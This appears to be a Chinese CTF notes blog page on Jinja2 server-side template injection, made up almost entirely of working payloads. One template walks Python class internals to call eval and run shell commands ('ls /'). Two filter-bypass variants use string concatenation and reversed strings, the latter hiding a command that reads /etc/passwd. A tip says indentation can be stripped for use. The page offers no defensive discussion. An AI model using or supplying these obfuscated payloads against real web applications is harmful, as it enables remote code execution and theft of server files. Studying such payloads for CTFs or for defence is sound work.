# jinja2

在jinja2中 控制结构 {% %} 变量取值 注释 {# #}

payload

{% for c in [].__class__.__base__.__subclasses__() %}
  {% if c.__name__ == 'catch_warnings' %}
    {% for b in c.__init__.__globals__.values() %}
      {% if b.__class__ == {}.__class__ %}
        {% if 'eval' in b.keys() %}
          {{ b['eval']('__import__("os").popen("ls /").read()') }}
        {% endif %}
      {% endif %}
    {% endfor %}
  {% endif %}
{% endfor %}
# python3
1
2
3
4
5
6
7
8
9
10
11
12

若过滤可采用以下方式bypass

  • 字符串拼接

    {% for c in [].__class__.__base__.__subclasses__() %}
  {% if c.__name__ == 'catch_wa'+'rni'+'ngs' %}
    {% for b in c.__init__.__globals__.values() %}
      {% if b.__class__ == {}.__class__ %}
        {% if 'eva'+'l' in b.keys() %}
          {{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("ls /").read()') }}
        {% endif %}
      {% endif %}
    {% endfor %}
  {% endif %}
{% endfor %}
# python3
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12

  • 倒序输出

    {% for c in [].__class__.__base__.__subclasses__() %}
  {% if c.__name__ == 'sgninraw_hctac'[::-1] %}
    {% for b in c.__init__.__globals__.values() %}
      {% if b.__class__ == {}.__class__ %}
        {% if 'lave'[::-1] in b.keys() %}
          {{ b['lave'[::-1]](')(daer.)"dwssap/cte/ tac"(nepop.)"so"(__tropmi__'[::-1]) }}
        {% endif %}
      {% endif %}
    {% endfor %}
  {% endif %}
{% endfor %}
# python3
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12

tips:上诉缩进只是方便观看层级逻辑,使用时完全可以删除缩进

#SSTI#web
上次更新: 2022/09/27, 23:04:02
PHP反序列化
.htaccess文件利用

.htaccess文件利用

最近更新
01
0CTF 2016 piapiapia
07-23
02
CISCN 2019 初赛 Love
07-22
03
PHP反序列化
07-21
更多文章>
Theme by Vdoing | Copyright © 2021-2022 Zephyr | MIT License
×